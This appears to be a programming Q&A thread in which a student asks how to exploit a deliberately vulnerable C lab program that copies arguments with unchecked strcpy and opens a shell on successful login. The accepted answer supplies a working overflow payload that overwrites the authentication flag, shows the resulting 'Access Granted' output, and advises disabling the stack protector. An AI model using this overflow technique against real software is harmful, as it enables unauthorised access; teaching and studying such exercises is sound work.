# How to get root access by buffer overflow attack?

Tags: c, buffer

How to do buffer overflow attack on this to get root access.
I tried finding an address but not got many leads in this.
I disabled ASLR and also used no stack pointer at the time of compilation.
when I enter more than 16 bytes it gave me segmentation fault in gdb:

```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifndef TEAM_VAR_SIZE
#define TEAM_VAR_SIZE 410 // <------ Change this from 0 to your team's value.
#endif

int check_authentication(char *username, char *password) {

   int auth_flag = 0;
   char team_var[TEAM_VAR_SIZE];
   char username_buffer[16];
   char password_buffer[16];

   strcpy(username_buffer, username);
   strcpy(password_buffer, password);

   if(strcmp(username_buffer, "This doesn't matter") == 0 && strcmp(password_buffer, "neither does this") == 0)
      auth_flag = 1;

   return auth_flag;

}

int main(int argc, char *argv[]) {

   if(argc < 3) {
      printf("Usage: %s <username> <password>\n", argv[0]);
      exit(0);
   }

   if(TEAM_VAR_SIZE == 0) {
        printf("\nPlease set the Team Var before moving forward with the lab.\n");
    }

   if(check_authentication(argv[1], argv[2]) == 1) {
      printf("\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
      printf("      Access Granted.\n");
      printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\n");
      system("/bin/sh");
   } else {
      printf("\nAccess Denied.\n");
   }

}
```

Comment: You can't get root access with an exploit unless you get root to execute the code.

Comment: @Barmar binary could have root permissions thanks to setuid

Comment: @AnisLadram True, but that requires root to give it setuid. At some point you have to get root to do something for you.

Comment: This is why most privilege escalation exploits involve buffer overflow bugs in system daemons, because they usually run as root.

Comment: @Barmar that is right, but consider this as an exercise for students. It's probably aimed at learning exploit techniques :)

Answer (score 0, accepted):

You can rewrite `auth_flag` using the buffer overflow caused by the insecure `strcpy(username_buffer, username)`. 412 bytes needs to be added to `username_buffer` length (16): 410 for the `team_var` buffer, and 2 for padding (smallest multiple of `sizeof(int) = 4` greater or equal to 410 is 412).

```sh
$ ./test "$(printf '%0*d\x1' $((16 + 412)) 0)" "x"

-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-

$
```

If you encounter the following error:

```sh
*** stack smashing detected ***: <unknown> terminated
```

then you need to compile your program using the following GCC flag: `-fno-stack-protector`. Canaries are security measures to prevent attackers from doing buffer overflows on the stack. It adds a random value at the end of your buffers to prevent the user from rewriting the return address and/or variables on the stack.

Comment: What should i enter if team size will be 440?

Comment: @Anonymous I guess 440? since 110 * 4 = 440. Don't hesitate to play around with it: try numbers until you have access granted (more if nothing happens, less if it segfaults).

Comment: Thanks Anis, I did it . I appreciate your help